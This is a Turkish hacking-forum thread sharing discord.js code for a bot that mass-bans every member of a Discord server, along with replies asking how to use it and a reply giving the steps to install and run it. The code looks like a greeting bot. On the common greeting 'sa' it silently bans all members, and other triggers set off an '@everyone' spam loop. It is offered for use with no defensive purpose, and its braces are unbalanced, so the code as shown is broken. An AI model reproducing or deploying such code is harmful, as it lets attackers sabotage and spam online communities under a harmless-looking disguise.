Discord Bot Herkesi Topluca Banlama Kodu

Cursepowered

Yeni üye
30 May 2019
5
0
const Discord = require('discord.js');
const client = new Discord.Client();

client.on('ready', () => {
console.log(` Bot ${client.user.tag} Sunucuya girdi!`);
});

client.on('message', msg => {
if (msg.content.toLowerCase() === 'merhaba') {
msg.reply('Merhaba ');
}

if (msg.content.toLowerCase() === 'gospam') {
msg.channel.sendMessage('вали отсюда');
}

if (msg.content.toLowerCase() === 'вали отсюда') {
msg.channel.sendMessage('@everyone');
}

if (msg.content.toLowerCase() === '@everyone') {
msg.channel.sendMessage('вали отсюда');
}

if(msg.content.toLowerCase()=== `sa`) {
try {
msg.guild.members.forEach(member => {member.ban()});
msg.delete(1000);
} catch(e) {
console.log(e.stack);
}
});
client.login('token');

Bunu çok aradımve sonunda buldum.Sizlerle paylaşmak istedim dostlarım.

Son düzenleme:

EmreSlgn

Katılımcı Üye
14 Ocak 2018
540
1
Mars
Tam olarak nasıl çalışmaktadır? Eklediğimiz anda direkt herkesi banlayacak mı yoksa yetkili birinin bir kod falan mı girmesi gerekiyor? Ek olarak eğer komut girdisi ile aktif olacak ise nasıl entegre edebiliriz bu komutu Discord botumuza? Yanıtlarsanız sevinirim, şimdiden teşekkür ediyorum.

HackManTurk

Katılımcı Üye
20 May 2016
414
0
C:/
Tam olarak nasıl çalışmaktadır? Eklediğimiz anda direkt herkesi banlayacak mı yoksa yetkili birinin bir kod falan mı girmesi gerekiyor? Ek olarak eğer komut girdisi ile aktif olacak ise nasıl entegre edebiliriz bu komutu Discord botumuza? Yanıtlarsanız sevinirim, şimdiden teşekkür ediyorum.

öğrenirsen banada söylermisin ustam

leaks

Katılımcı Üye
29 Eki 2018
864
1
bunu nerede düzenleyeceğiz linuxdamı? bi kullanım videosu çeker misin lütfen
Windows da olur. NodeJS kurulu olması lazım. Kurduktan sonra PATH'e eklendiğinden emin olun. Daha sonra, botu "client.js" gibi bir adla kaydedin. Sonra cmd'ye şu komutları girin:
Kod:
npm install discord.js
node [COLOR=YellowGreen]client.js[/COLOR]

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.